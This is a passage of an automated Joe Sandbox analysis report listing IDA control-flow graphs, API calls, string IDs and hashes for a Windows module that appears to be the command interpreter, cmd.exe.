CreateProcessAsUserW 22202->22205 22206 7ff7823e448b 22204->22206 22205->22206 22207 7ff7823e4495 CloseHandle 22206->22207 22208 7ff7823e4672 GetLastError 22206->22208 22209 7ff7823e498c 8 API calls 22207->22209 22221 7ff7823e468d 22208->22221 22210 7ff7823e44c5 22209->22210 22213 7ff7823e44cd 22210->22213 22210->22221 22211 7ff7823e47a3 22211->22057 22212 7ff7823e44f8 22212->22211 22214 7ff7823e4612 22212->22214 22216 7ff7823e5cb4 7 API calls 22212->22216 22213->22211 22213->22212 22232 7ff7823fa250 33 API calls 22213->22232 22217 7ff7823e461c 22214->22217 22219 7ff7823e47e1 CloseHandle 22214->22219 22215 7ff7823dcd90 166 API calls 22218 7ff7823e4724 22215->22218 22220 7ff7823e4517 22216->22220 22223 7ff7823dff70 GetProcessHeap RtlFreeHeap 22217->22223 22222 7ff7823e472c _local_unwind 22218->22222 22227 7ff7823e473d 22218->22227 22219->22217 22224 7ff7823e33f0 _vsnwprintf 22220->22224 22221->22213 22221->22215 22222->22227 22225 7ff7823e47fa DeleteProcThreadAttributeList 22223->22225 22226 7ff7823e4544 22224->22226 22228 7ff7823e8f80 7 API calls 22225->22228 22229 7ff7823e498c 8 API calls 22226->22229 22233 7ff7823dff70 GetProcessHeap RtlFreeHeap 22227->22233 22230 7ff7823e4820 22228->22230 22231 7ff7823e4558 22229->22231 22230->22057 22234 7ff7823e4564 22231->22234 22235 7ff7823e47ae 22231->22235 22232->22212 22236 7ff7823e475b _local_unwind 22233->22236 22237 7ff7823e498c 8 API calls 22234->22237 22238 7ff7823e33f0 _vsnwprintf 22235->22238 22236->22213 22239 7ff7823e4577 22237->22239 22238->22214 22239->22217 22240 7ff7823e457f 22239->22240 22241 7ff7823fa920 210 API calls 22240->22241 22242 7ff7823e4584 22241->22242 22242->22217 22248 7ff7823d9737 22243->22248 22245 7ff7823d977d memset 22247 7ff7823dca40 17 API calls 22245->22247 22246 7ff7823dcd90 166 API calls 22246->22248 22247->22248 22248->22245 22248->22246 22249 7ff7823eb76e 22248->22249 22250 7ff7823eb7b3 22248->22250 22252 7ff7823db364 17 API calls 22248->22252 22259 7ff7823eb79a 22248->22259 22261 7ff7823d986d 22248->22261 22262 7ff7823d96b4 186 API calls 22248->22262 22282 7ff7823e1fac memset 22248->22282 22309 7ff7823dce10 22248->22309 22359 7ff7823e5920 22248->22359 22251 7ff7823d3278 166 API calls 22249->22251 22255 7ff7823eb787 22251->22255 22252->22248 22253 7ff7823e855c ??_V@YAXPEAX 22253->22250 22254 7ff7823eb795 22365 7ff7823f7694 22254->22365 22255->22254 22258 7ff7823fe944 393 API calls 22255->22258 22258->22254 22259->22253 22263 7ff7823d9880 ??_V@YAXPEAX 22261->22263 22264 7ff7823d988c 22261->22264 22262->22248 22263->22264 22265 7ff7823e8f80 7 API calls 22264->22265 22266 7ff7823d989d 22265->22266 22266->22057 22269 7ff7823e3a90 170 API calls 22268->22269 22270 7ff7823f9064 22269->22270 22271 7ff7823f9083 22270->22271 22272 7ff7823f906e 22270->22272 22274 7ff7823dcd90 166 API calls 22271->22274 22273 7ff7823e498c 8 API calls 22272->22273 22275 7ff7823f9081 22273->22275 22276 7ff7823f909b 22274->22276 22275->22197 22276->22275 22277 7ff7823e498c 8 API calls 22276->22277 22278 7ff7823f90ec 22277->22278 22279 7ff7823dff70 2 API calls 22278->22279 22279->22275 22281 7ff7823eed0a DeleteProcThreadAttributeList 22280->22281 22281->22188 22284 7ff7823e203b 22282->22284 22283 7ff7823e20b0 22285 7ff7823e3060 171 API calls 22283->22285 22287 7ff7823e211c 22283->22287 22284->22283 22286 7ff7823e2094 22284->22286 22285->22287 22288 7ff7823e20a6 22286->22288 22289 7ff7823d3278 166 API calls 22286->22289 22287->22288 22290 7ff7823e2e44 2 API calls 22287->22290 22291 7ff7823e8f80 7 API calls 22288->22291 22289->22288 22293 7ff7823e2148 22290->22293 22292 7ff7823e2325 22291->22292 22292->22248 22293->22288 22294 7ff7823e2d70 3 API calls 22293->22294 22295 7ff7823e21af 22294->22295 22296 7ff7823db900 166 API calls 22295->22296 22298 7ff7823e21d0 22296->22298 22297 7ff7823ee04a ??_V@YAXPEAX 22297->22288 22298->22297 22299 7ff7823e221c wcsspn 22298->22299 22308 7ff7823e22a4 ??_V@YAXPEAX 22298->22308 22301 7ff7823db900 166 API calls 22299->22301 22302 7ff7823e223b 22301->22302 22302->22297 22306 7ff7823e2252 22302->22306 22303 7ff7823e228f 22304 7ff7823dd3f0 223 API calls 22303->22304 22304->22308 22305 7ff7823ee06d wcschr 22305->22306 22306->22303 22306->22305 22307 7ff7823ee090 towupper 22306->22307 22307->22303 22307->22306 22308->22288 22347 7ff7823dd0f8 22309->22347 22351 7ff7823dce5b 22309->22351 22310 7ff7823e8f80 7 API calls 22313 7ff7823dd10a 22310->22313 22311 7ff7823ec860 22312 7ff7823ec97c 22311->22312 22315 7ff7823fee88 390 API calls 22311->22315 22314 7ff7823fe9b4 197 API calls 22312->22314 22313->22248 22317 7ff7823ec981 longjmp 22314->22317 22318 7ff7823ec879 22315->22318 22316 7ff7823e0494 182 API calls 22316->22351 22319 7ff7823ec99a 22317->22319 22320 7ff7823ec882 EnterCriticalSection LeaveCriticalSection 22318->22320 22321 7ff7823ec95c 22318->22321 22323 7ff7823ec9b3 ??_V@YAXPEAX 22319->22323 22319->22347 22325 7ff7823dd0e3 22320->22325 22321->22312 22326 7ff7823d96b4 186 API calls 22321->22326 22323->22347 22324 7ff7823dceaa _tell 22327 7ff7823dd208 _close 22324->22327 22325->22248 22326->22321 22327->22351 22328 7ff7823dcd90 166 API calls 22328->22351 22329 7ff7823ec9d5 22330 7ff7823fd610 167 API calls 22329->22330 22332 7ff7823ec9da 22330->22332 22331 7ff7823db900 166 API calls 22331->22351 22333 7ff7823eca07 22332->22333 22335 7ff7823fbfec 176 API calls 22332->22335 22334 7ff7823fe91c 198 API calls 22333->22334 22339 7ff7823eca0c 22334->22339 22336 7ff7823ec9f1 22335->22336 22337 7ff7823d3240 166 API calls 22336->22337 22337->22333 22338 7ff7823dcf33 memset 22338->22351 22339->22248 22340 7ff7823dca40 17 API calls 22340->22351 22341 7ff7823dd184 wcschr 22341->22351 22342 7ff7823fbfec 176 API calls 22342->22351 22343 7ff7823ec9c9 22345 7ff7823e855c ??_V@YAXPEAX 22343->22345 22344 7ff7823dd1a7 wcschr 22344->22351 22345->22347 22346 7ff7823f778c 166 API calls 22346->22351 22347->22310 22348 7ff7823e0a6c 273 API calls 22348->22351 22349 7ff7823dbe00 635 API calls 22349->22351 22350 7ff7823e3448 166 API calls 22350->22351 22351->22311 22351->22316 22351->22319 22351->22325 22351->22328 22351->22329 22351->22331 22351->22338 22351->22340 22351->22341 22351->22342 22351->22343 22351->22344 22351->22346 22351->22347 22351->22348 22351->22349 22351->22350 22352 7ff7823dcfab _wcsicmp 22351->22352 22353 7ff7823e0580 12 API calls 22351->22353 22357 7ff7823e1fac 238 API calls 22351->22357 22358 7ff7823dd044 ??_V@YAXPEAX 22351->22358 22371 7ff7823ddf60 22351->22371 22391 7ff7823fc738 22351->22391 22352->22351 22354 7ff7823dd003 GetConsoleOutputCP GetCPInfo 22353->22354 22355 7ff7823e04f4 3 API calls 22354->22355 22355->22351 22357->22351 22358->22351 22360 7ff7823e596c 22359->22360 22364 7ff7823e5a12 22359->22364 22361 7ff7823e598d VirtualQuery 22360->22361 22360->22364 22363 7ff7823e59ad 22361->22363 22361->22364 22362 7ff7823e59b7 VirtualQuery 22362->22363 22362->22364 22363->22362 22363->22364 22364->22248 22369 7ff7823f76a3 22365->22369 22366 7ff7823f76b7 22368 7ff7823fe9b4 197 API calls 22366->22368 22367 7ff7823d96b4 186 API calls 22367->22369 22370 7ff7823f76bc longjmp 22368->22370 22369->22366 22369->22367 22372 7ff7823ddf93 22371->22372 22373 7ff7823ddfe2 22371->22373 22372->22373 22374 7ff7823ddf9f GetProcessHeap RtlFreeHeap 22372->22374 22375 7ff7823de100 VirtualFree 22373->22375 22376 7ff7823de00b _setjmp 22373->22376 22374->22372 22374->22373 22375->22373 22377 7ff7823de0c3 22376->22377 22378 7ff7823de04a 22376->22378 22377->22324 22379 7ff7823de600 473 API calls 22378->22379 22380 7ff7823de073 22379->22380 22381 7ff7823de0e0 longjmp 22380->22381 22382 7ff7823de081 22380->22382 22384 7ff7823de0b0 22381->22384 22383 7ff7823dd250 475 API calls 22382->22383 22385 7ff7823de086 22383->22385 22384->22377 22401 7ff7823fd3fc 22384->22401 22385->22384 22388 7ff7823de600 473 API calls 22385->22388 22389 7ff7823de0a7 22388->22389 22389->22384 22390 7ff7823fd610 167 API calls 22389->22390 22390->22384 22392 7ff7823fc775 22391->22392 22399 7ff7823fc7ab 22391->22399 22393 7ff7823dcd90 166 API calls 22392->22393 22395 7ff7823fc781 22393->22395 22394 7ff7823fc8d4 22394->22351 22395->22394 22396 7ff7823db0d8 194 API calls 22395->22396 22396->22394 22397 7ff7823db6b0 170 API calls 22397->22399 22398 7ff7823db038 _dup2 22398->22399 22399->22394 22399->22395 22399->22397 22399->22398 22400 7ff7823dd208 _close 22399->22400 22400->22399 22412 7ff7823fd419 22401->22412 22402 7ff7823ecadf 22403 7ff7823e3448 166 API calls 22403->22412 22404 7ff7823fd592 22406 7ff7823e3448 166 API calls 22404->22406 22405 7ff7823fd5c4 22407 7ff7823e3448 166 API calls 22405->22407 22409 7ff7823fd5a5 22406->22409 22407->22402 22411 7ff7823fd5ba 22409->22411 22415 7ff7823e3448 166 API calls 22409->22415 22410 7ff7823fd546 22410->22405 22413 7ff7823fd555 22410->22413 22419 7ff7823fd36c 22411->22419 22412->22402 22412->22403 22412->22404 22412->22405 22412->22413 22414 7ff7823fd541 22412->22414 22417 7ff7823fd3fc 166 API calls 22412->22417 22426 7ff7823fd31c 22413->22426 22414->22404 22414->22405 22414->22410 22418 7ff7823fd589 22414->22418 22415->22411 22417->22412 22418->22404 22418->22413 22420 7ff7823fd381 22419->22420 22421 7ff7823fd3d8 22419->22421 22422 7ff7823e34a0 166 API calls 22420->22422 22425 7ff7823fd390 22422->22425 22423 7ff7823e3448 166 API calls 22423->22425 22424 7ff7823e34a0 166 API calls 22424->22425 22425->22421 22425->22423 22425->22424 22427 7ff7823e3448 166 API calls 22426->22427 22428 7ff7823fd33b 22427->22428 22429 7ff7823fd36c 166 API calls 22428->22429 22430 7ff7823fd343 22429->22430 22431 7ff7823fd3fc 166 API calls 22430->22431 22448 7ff7823fd34e 22431->22448 22432 7ff7823fd5c2 22432->22402 22433 7ff7823fd592 22435 7ff7823e3448 166 API calls 22433->22435 22434 7ff7823fd5c4 22436 7ff7823e3448 166 API calls 22434->22436 22438 7ff7823fd5a5 22435->22438 22436->22432 22437 7ff7823fd31c 166 API calls 22437->22432 22440 7ff7823fd5ba 22438->22440 22443 7ff7823e3448 166 API calls 22438->22443 22439 7ff7823fd546 22439->22434 22441 7ff7823fd555 22439->22441 22444 7ff7823fd36c 166 API calls 22440->22444 22441->22437 22442 7ff7823fd541 22442->22433 22442->22434 22442->22439 22446 7ff7823fd589 22442->22446 22443->22440 22444->22432 22445 7ff7823fd3fc 166 API calls 22445->22448 22446->22433 22446->22441 22447 7ff7823e3448 166 API calls 22447->22448 22448->22432 22448->22433 22448->22434 22448->22441 22448->22442 22448->22445 22448->22447 22450 7ff7823dc486 22449->22450 22451 7ff7823dc4c9 22449->22451 22452 7ff7823dc48e wcschr 22450->22452 22457 7ff7823dc161 22450->22457 22455 7ff7823dff70 2 API calls 22451->22455 22451->22457 22453 7ff7823dc4ef 22452->22453 22452->22457 22454 7ff7823dcd90 166 API calls 22453->22454 22456 7ff7823dc4f9 22454->22456 22455->22457 22456->22457 22460 7ff7823dc5bd 22456->22460 22461 7ff7823dd840 178 API calls 22456->22461 22462 7ff7823dc541 22456->22462 22457->22065 22457->22087 22458 7ff7823dff70 2 API calls 22458->22457 22459 7ff7823db6b0 170 API calls 22459->22462 22460->22459 22460->22462 22461->22456 22462->22457 22462->22458 22463->22126 22465 7ff7823f4621 22464->22465 22466 7ff7823d72de 22464->22466 22468 7ff7823f447b longjmp 22465->22468 22473 7ff7823f4639 22465->22473 22489 7ff7823f47e0 22465->22489 22499 7ff7823f475e 22465->22499 22467 7ff7823d72eb 22466->22467 22471 7ff7823f4530 22466->22471 22472 7ff7823f4467 22466->22472 22525 7ff7823d7348 22467->22525 22474 7ff7823f4492 22468->22474 22469 7ff7823d7348 168 API calls 22524 7ff7823f4524 22469->22524 22479 7ff7823d7348 168 API calls 22471->22479 22472->22467 22472->22474 22484 7ff7823f4475 22472->22484 22477 7ff7823f4695 22473->22477 22486 7ff7823f463e 22473->22486 22478 7ff7823d7348 168 API calls 22474->22478 22476 7ff7823d7315 22540 7ff7823d73d4 22476->22540 22483 7ff7823d73d4 168 API calls 22477->22483 22495 7ff7823f44a8 22478->22495 22497 7ff7823f4549 22479->22497 22480 7ff7823d72b0 168 API calls 22487 7ff7823f480e 22480->22487 22481 7ff7823d7348 168 API calls 22481->22476 22505 7ff7823f469a 22483->22505 22484->22468 22484->22477 22485 7ff7823d7348 168 API calls 22485->22489 22486->22468 22490 7ff7823f4654 22486->22490 22487->22162 22488 7ff7823d7323 22488->22162 22489->22469 22498 7ff7823d7348 168 API calls 22490->22498 22491 7ff7823f45b2 22493 7ff7823d7348 168 API calls 22491->22493 22492 7ff7823f46e1 22500 7ff7823d72b0 168 API calls 22492->22500 22501 7ff7823f45c7 22493->22501 22494 7ff7823f455e 22494->22491 22506 7ff7823d7348 168 API calls 22494->22506 22496 7ff7823f44e2 22495->22496 22502 7ff7823d7348 168 API calls 22495->22502 22503 7ff7823d72b0 168 API calls 22496->22503 22497->22491 22497->22494 22513 7ff7823d7348 168 API calls 22497->22513 22498->22488 22499->22485 22504 7ff7823f4738 22500->22504 22507 7ff7823d7348 168 API calls 22501->22507 22502->22496 22508 7ff7823f44f1 22503->22508 22509 7ff7823d7348 168 API calls 22504->22509 22505->22492 22516 7ff7823f46ea 22505->22516 22517 7ff7823f46c7 22505->22517 22506->22491 22510 7ff7823f45db 22507->22510 22512 7ff7823d72b0 168 API calls 22508->22512 22509->22524 22511 7ff7823d7348 168 API calls 22510->22511 22514 7ff7823f45ec 22511->22514 22515 7ff7823f4503 22512->22515 22513->22494 22519 7ff7823d7348 168 API calls 22514->22519 22515->22488 22521 7ff7823d7348 168 API calls 22515->22521 22518 7ff7823d7348 168 API calls 22516->22518 22517->22492 22522 7ff7823d7348 168 API calls 22517->22522 22518->22492 22520 7ff7823f4600 22519->22520 22523 7ff7823d7348 168 API calls 22520->22523 22521->22524 22522->22492 22523->22524 22524->22480 22524->22488 22527 7ff7823d735d 22525->22527 22526 7ff7823d3278 166 API calls 22528 7ff7823f4820 longjmp 22526->22528 22527->22526 22527->22527 22529 7ff7823f4838 22527->22529 22539 7ff7823d73ab 22527->22539 22528->22529 22530 7ff7823d3278 166 API calls 22529->22530 22531 7ff7823f4844 longjmp 22530->22531 22532 7ff7823f485a 22531->22532 22533 7ff7823d7348 166 API calls 22532->22533 22534 7ff7823f487b 22533->22534 22535 7ff7823d7348 166 API calls 22534->22535 22536 7ff7823f48ad 22535->22536 22537 7ff7823d7348 166 API calls 22536->22537 22538 7ff7823d72ff 22537->22538 22538->22476 22538->22481 22541 7ff7823d7401 22540->22541 22541->22488 22542 7ff7823d7348 168 API calls 22541->22542 22543 7ff7823f487b 22542->22543 22544 7ff7823d7348 168 API calls 22543->22544 22545 7ff7823f48ad 22544->22545 22546 7ff7823d7348 168 API calls 22545->22546 22547 7ff7823f48be 22546->22547 22547->22488
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                                  • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                                  • API String ID: 3305344409-4288247545
                                                                                                  • Opcode ID: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                                                                                  • Instruction ID: f1fc7b43091ccaca5fd533c30268ff22d908fca2381e32a1fa5fffd121b7dbd5
                                                                                                  • Opcode Fuzzy Hash: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                                                                                  • Instruction Fuzzy Hash: 55421A25A0868295EB50BB11D8202B9E7A0FF85B96FE44178DD5E57FD4DFBCE848C320

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 216 7ff7823daa54-7ff7823daa98 call 7ff7823dcd90 219 7ff7823daa9e 216->219 220 7ff7823ebf5a-7ff7823ebf70 call 7ff7823e4c1c call 7ff7823dff70 216->220 222 7ff7823daaa5-7ff7823daaa8 219->222 223 7ff7823dacde-7ff7823dad00 222->223 224 7ff7823daaae-7ff7823daac8 wcschr 222->224 229 7ff7823dad06 223->229 224->223 226 7ff7823daace-7ff7823daae9 towlower 224->226 226->223 228 7ff7823daaef-7ff7823daaf3 226->228 231 7ff7823ebeb7-7ff7823ebec4 call 7ff7823feaf0 228->231 232 7ff7823daaf9-7ff7823daafd 228->232 233 7ff7823dad0d-7ff7823dad1f 229->233 248 7ff7823ebec6-7ff7823ebed8 call 7ff7823d3240 231->248 249 7ff7823ebf43-7ff7823ebf59 call 7ff7823e4c1c 231->249 235 7ff7823dab03-7ff7823dab07 232->235 236 7ff7823ebbcf 232->236 237 7ff7823dad22-7ff7823dad2a call 7ff7823e13e0 233->237 239 7ff7823dab7d-7ff7823dab81 235->239 240 7ff7823dab09-7ff7823dab0d 235->240 243 7ff7823ebbde 236->243 237->222 244 7ff7823ebe63 239->244 245 7ff7823dab87-7ff7823dab95 239->245 240->244 246 7ff7823dab13-7ff7823dab17 240->246 255 7ff7823ebbea-7ff7823ebbec 243->255 258 7ff7823ebe72-7ff7823ebe88 call 7ff7823d3278 call 7ff7823e4c1c 244->258 250 7ff7823dab98-7ff7823daba0 245->250 246->239 251 7ff7823dab19-7ff7823dab1d 246->251 248->249 263 7ff7823ebeda-7ff7823ebee9 call 7ff7823d3240 248->263 249->220 250->250 256 7ff7823daba2-7ff7823dabb3 call 7ff7823dcd90 250->256 251->243 257 7ff7823dab23-7ff7823dab27 251->257 264 7ff7823ebbf8-7ff7823ebc01 255->264 256->220 270 7ff7823dabb9-7ff7823dabde call 7ff7823e13e0 call 7ff7823e33a8 256->270 257->255 261 7ff7823dab2d-7ff7823dab31 257->261 284 7ff7823ebe89-7ff7823ebe8c 258->284 261->229 266 7ff7823dab37-7ff7823dab3b 261->266 273 7ff7823ebef3-7ff7823ebef9 263->273 274 7ff7823ebeeb-7ff7823ebef1 263->274 264->233 266->264 271 7ff7823dab41-7ff7823dab45 266->271 308 7ff7823dabe4-7ff7823dabe7 270->308 309 7ff7823dac75 270->309 276 7ff7823ebc06-7ff7823ebc2a call 7ff7823e13e0 271->276 277 7ff7823dab4b-7ff7823dab4f 271->277 273->249 279 7ff7823ebefb-7ff7823ebf0d call 7ff7823d3240 273->279 274->249 274->273 295 7ff7823ebc2c-7ff7823ebc4c _wcsnicmp 276->295 296 7ff7823ebc5a-7ff7823ebc61 276->296 282 7ff7823dab55-7ff7823dab78 call 7ff7823e13e0 277->282 283 7ff7823dad2f-7ff7823dad33 277->283 279->249 306 7ff7823ebf0f-7ff7823ebf21 call 7ff7823d3240 279->306 282->222 290 7ff7823ebc66-7ff7823ebc8a call 7ff7823e13e0 283->290 291 7ff7823dad39-7ff7823dad3d 283->291 285 7ff7823ebe92-7ff7823ebeaa call 7ff7823d3278 call 7ff7823e4c1c 284->285 286 7ff7823dacbe 284->286 337 7ff7823ebeab-7ff7823ebeb6 call 7ff7823e4c1c 285->337 301 7ff7823dacc0-7ff7823dacc7 286->301 325 7ff7823ebcc4-7ff7823ebcdc 290->325 326 7ff7823ebc8c-7ff7823ebcaa _wcsnicmp 290->326 298 7ff7823dad43-7ff7823dad49 291->298 299 7ff7823ebcde-7ff7823ebd02 call 7ff7823e13e0 291->299 295->296 307 7ff7823ebc4e-7ff7823ebc55 295->307 312 7ff7823ebd31-7ff7823ebd4f _wcsnicmp 296->312 310 7ff7823dad4f-7ff7823dad68 298->310 311 7ff7823ebd5e-7ff7823ebd65 298->311 329 7ff7823ebd04-7ff7823ebd24 _wcsnicmp 299->329 330 7ff7823ebd2a 299->330 301->301 303 7ff7823dacc9-7ff7823dacda 301->303 303->223 306->249 339 7ff7823ebf23-7ff7823ebf35 call 7ff7823d3240 306->339 320 7ff7823ebbb3-7ff7823ebbb7 307->320 308->286 322 7ff7823dabed-7ff7823dac0b call 7ff7823dcd90 * 2 308->322 317 7ff7823dac77-7ff7823dac7f 309->317 323 7ff7823dad6d-7ff7823dad70 310->323 324 7ff7823dad6a 310->324 311->310 321 7ff7823ebd6b-7ff7823ebd73 311->321 318 7ff7823ebd55 312->318 319 7ff7823ebbc2-7ff7823ebbca 312->319 317->286 336 7ff7823dac81-7ff7823dac85 317->336 318->311 319->222 331 7ff7823ebbba-7ff7823ebbbd call 7ff7823e13e0 320->331 332 7ff7823ebd79-7ff7823ebd8b iswxdigit 321->332 333 7ff7823ebe4a-7ff7823ebe5e 321->333 322->337 356 7ff7823dac11-7ff7823dac14 322->356 323->237 324->323 325->312 326->325 327 7ff7823ebcac-7ff7823ebcbf 326->327 327->320 329->330 338 7ff7823ebbac 329->338 330->312 331->319 332->333 342 7ff7823ebd91-7ff7823ebda3 iswxdigit 332->342 333->331 340 7ff7823dac88-7ff7823dac8f 336->340 337->231 338->320 339->249 357 7ff7823ebf37-7ff7823ebf3e call 7ff7823d3240 339->357 340->340 348 7ff7823dac91-7ff7823dac94 340->348 342->333 345 7ff7823ebda9-7ff7823ebdbb iswxdigit 342->345 345->333 353 7ff7823ebdc1-7ff7823ebdd7 iswdigit 345->353 348->286 352 7ff7823dac96-7ff7823dacaa wcsrchr 348->352 352->286 358 7ff7823dacac-7ff7823dacb9 call 7ff7823e1300 352->358 354 7ff7823ebddf-7ff7823ebdeb towlower 353->354 355 7ff7823ebdd9-7ff7823ebddd 353->355 359 7ff7823ebdee-7ff7823ebe0f iswdigit 354->359 355->359 356->337 360 7ff7823dac1a-7ff7823dac33 memset 356->360 357->249 358->286 363 7ff7823ebe11-7ff7823ebe15 359->363 364 7ff7823ebe17-7ff7823ebe23 towlower 359->364 360->309 365 7ff7823dac35-7ff7823dac4b wcschr 360->365 366 7ff7823ebe26-7ff7823ebe45 call 7ff7823e13e0 363->366 364->366 365->309 367 7ff7823dac4d-7ff7823dac54 365->367 366->333 368 7ff7823dad72-7ff7823dad91 wcschr 367->368 369 7ff7823dac5a-7ff7823dac6f wcschr 367->369 371 7ff7823daf03-7ff7823daf07 368->371 372 7ff7823dad97-7ff7823dadac wcschr 368->372 369->309 369->368 371->309 372->371 373 7ff7823dadb2-7ff7823dadc7 wcschr 372->373 373->371 374 7ff7823dadcd-7ff7823dade2 wcschr 373->374 374->371 375 7ff7823dade8-7ff7823dadfd wcschr 374->375 375->371 376 7ff7823dae03-7ff7823dae18 wcschr 375->376 376->371 377 7ff7823dae1e-7ff7823dae21 376->377 378 7ff7823dae24-7ff7823dae27 377->378 378->371 379 7ff7823dae2d-7ff7823dae40 iswspace 378->379 380 7ff7823dae42-7ff7823dae49 379->380 381 7ff7823dae4b-7ff7823dae5e 379->381 380->378 382 7ff7823dae66-7ff7823dae6d 381->382 382->382 383 7ff7823dae6f-7ff7823dae77 382->383 383->258 384 7ff7823dae7d-7ff7823dae97 call 7ff7823e13e0 383->384 387 7ff7823dae9a-7ff7823daea4 384->387 388 7ff7823daea6-7ff7823daead 387->388 389 7ff7823daebc-7ff7823daef8 call 7ff7823e0a6c call 7ff7823dff70 * 2 387->389 388->389 390 7ff7823daeaf-7ff7823daeba 388->390 389->317 397 7ff7823daefe 389->397 390->387 390->389 397->284
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                                  • String ID: :$:$:$:ON$OFF
                                                                                                  • API String ID: 972821348-467788257
                                                                                                  • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                  • Instruction ID: 4a7e53762f0a869fec2d6f8f4a0b61da8195ee142f5ac8839a682d2addbe7c28
                                                                                                  • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                  • Instruction Fuzzy Hash: DD22C565A0864395EB65BF21D524278EA91FF48B83FE88079C90E47F94DFBCA844C370

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 398 7ff7823e51ec-7ff7823e5248 call 7ff7823e5508 GetLocaleInfoW 401 7ff7823eef32-7ff7823eef3c 398->401 402 7ff7823e524e-7ff7823e5272 GetLocaleInfoW 398->402 405 7ff7823eef3f-7ff7823eef49 401->405 403 7ff7823e5274-7ff7823e527a 402->403 404 7ff7823e5295-7ff7823e52b9 GetLocaleInfoW 402->404 406 7ff7823e5280-7ff7823e5286 403->406 407 7ff7823e54f7-7ff7823e54f9 403->407 408 7ff7823e52bb-7ff7823e52c3 404->408 409 7ff7823e52de-7ff7823e5305 GetLocaleInfoW 404->409 410 7ff7823eef61-7ff7823eef6c 405->410 411 7ff7823eef4b-7ff7823eef52 405->411 406->407 413 7ff7823e528c-7ff7823e528f 406->413 407->401 414 7ff7823eef75-7ff7823eef78 408->414 415 7ff7823e52c9-7ff7823e52d7 408->415 416 7ff7823e5321-7ff7823e5343 GetLocaleInfoW 409->416 417 7ff7823e5307-7ff7823e531b 409->417 410->414 411->410 412 7ff7823eef54-7ff7823eef5f 411->412 412->405 412->410 413->404 418 7ff7823eef99-7ff7823eefa3 414->418 419 7ff7823eef7a-7ff7823eef7d 414->419 415->409 420 7ff7823eefaf-7ff7823eefb9 416->420 421 7ff7823e5349-7ff7823e536e GetLocaleInfoW 416->421 417->416 418->420 419->409 424 7ff7823eef83-7ff7823eef8d 419->424 425 7ff7823eefbc-7ff7823eefc6 420->425 422 7ff7823e5374-7ff7823e5396 GetLocaleInfoW 421->422 423 7ff7823eeff2-7ff7823eeffc 421->423 427 7ff7823ef035-7ff7823ef03f 422->427 428 7ff7823e539c-7ff7823e53be GetLocaleInfoW 422->428 426 7ff7823eefff-7ff7823ef009 423->426 424->418 429 7ff7823eefde-7ff7823eefe9 425->429 430 7ff7823eefc8-7ff7823eefcf 425->430 431 7ff7823ef021-7ff7823ef02c 426->431 432 7ff7823ef00b-7ff7823ef012 426->432 435 7ff7823ef042-7ff7823ef04c 427->435 433 7ff7823e53c4-7ff7823e53e6 GetLocaleInfoW 428->433 434 7ff7823ef078-7ff7823ef082 428->434 429->423 430->429 436 7ff7823eefd1-7ff7823eefdc 430->436 431->427 432->431 437 7ff7823ef014-7ff7823ef01f 432->437 438 7ff7823e53ec-7ff7823e540e GetLocaleInfoW 433->438 439 7ff7823ef0bb-7ff7823ef0c5 433->439 442 7ff7823ef085-7ff7823ef08f 434->442 440 7ff7823ef064-7ff7823ef06f 435->440 441 7ff7823ef04e-7ff7823ef055 435->441 436->425 436->429 437->426 437->431 444 7ff7823e5414-7ff7823e5436 GetLocaleInfoW 438->444 445 7ff7823ef0fe-7ff7823ef108 438->445 443 7ff7823ef0c8-7ff7823ef0d2 439->443 440->434 441->440 446 7ff7823ef057-7ff7823ef062 441->446 447 7ff7823ef091-7ff7823ef098 442->447 448 